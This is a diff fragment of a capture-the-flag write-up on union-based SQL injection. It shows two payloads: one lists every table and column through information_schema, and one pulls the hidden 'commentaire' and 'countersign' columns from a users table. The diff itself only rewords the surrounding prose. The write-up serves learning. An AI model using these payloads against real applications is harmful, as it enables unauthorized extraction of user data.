RoKerjea/darkly/flag05-Union_based_SQL/Ressources/report.md

 5 UNION SELECT table_name, column_name FROM information_schema.columns
 ```

-To see all columns from users.
+This allowed us to list all columns from all tables, including the users table.

-We observe some columns that are not displayed, e.g. `Commentaire` and `countersign`.
+We noticed that some columns, such as commentaire and countersign, were not visible in the original page.

 ```sql
 5 UNION SELECT commentaire, countersign FROM users